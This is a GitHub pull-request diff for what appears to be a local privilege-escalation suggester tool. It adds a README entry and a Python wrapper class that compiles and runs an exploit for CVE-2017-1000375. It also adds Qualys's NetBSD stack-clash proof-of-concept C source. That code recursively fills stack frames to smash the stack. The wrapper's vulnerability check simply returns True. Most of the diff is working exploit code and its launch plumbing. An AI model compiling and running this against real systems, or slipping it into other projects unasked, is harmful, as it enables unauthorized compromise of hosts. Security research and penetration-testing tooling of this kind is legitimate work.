Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -74,6 +74,8 @@ which makes it useful as a host-side only enumeration tool.

* `CVE-2017-1000379`

* `CVE-2017-1000375`

* `CVE-2017-1000373`

* `CVE-2017-1000372`
Expand Down
4 changes: 3 additions & 1 deletion constants.py
Original file line number Diff line number Diff line change
Expand Up @@ -54,6 +54,8 @@
ARCHITECTURE_x86_64 = "x86_64"
ARCHITECTURE_amd64 = "amd64"
ARCHITECTURE_i686 = "i686"
ARCHITECTURE_i386 = "i386"


GENERIC_MAC = "mac"

Expand Down Expand Up @@ -136,4 +138,4 @@ def shell_results(shell_command):
stderr=subprocess.PIPE,
shell=True
)
return p.communicate()
return p.communicate()
33 changes: 33 additions & 0 deletions exploits/linux/CVE20171000375.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
"""
https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
https://www.exploit-db.com/exploits/42272/
"""
import os
from exploits.exploit import LinuxExploit
from src.kernels import KernelWindow
from constants import NETBSD, PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH, HIGH_RELIABILITY, color_print, CONFIRMED_VULNERABLE

class CVE20171000375(LinuxExploit):
def __init__(self):
super().__init__()
self.name = "CVE20171000375"
self.formatted_name = "CVE-2017-1000375"
self.type = "linux"
self.brief_desc = "Stack clash vulnerability from qualys"
self.reliability = HIGH_RELIABILITY
self.vulnerable_kernels = [
KernelWindow(NETBSD, CONFIRMED_VULNERABLE, 4, 0, 0, 7, 1, 0)
]
self.source_c_path = os.path.join(LINUX_EXPLOIT_SOURCE_PATH, "{}.c".format(self.name))
self.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)
self.compilation_command = "gcc -o {} {}".format(self.compilation_path, self.source_c_path)
self.exploit_command = "{0} {1}".format(self.compilation_path, "0x04000000")

def determine_vulnerability(self):
"""
:return: True if vulnerable, False if not
"""
color_print("\t[*] checking exploitation prerequisites for {}".format(self.name), color="blue")
# if kernel matches...it should be vulnerable
color_print("\t[+] system appears to be vulnerable to {}".format(self.name), color="green")
return True
51 changes: 51 additions & 0 deletions exploits/linux/source/CVE20171000375.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
/*
* NetBSD_CVE-2017-1000375.c (please compile with -O0)
* Copyright (C) 2017 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/time.h>

#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)

static void
smash_no_jump(const size_t smash_size)
{
char buf[1024];
memset(buf, 'A', sizeof(buf));
if (smash_size > sizeof(buf))
smash_no_jump(smash_size - sizeof(buf));
}

int
main(const int argc, const char * const argv[])
{
static const struct rlimit core;
if (setrlimit(RLIMIT_CORE, &core)) die();

if (argc != 2) die();
const size_t smash_size = strtoul(argv[1], NULL, 0);
if (smash_size <= 0 || smash_size >= SSIZE_MAX) die();
smash_no_jump(smash_size);
exit(EXIT_SUCCESS);
}
Loading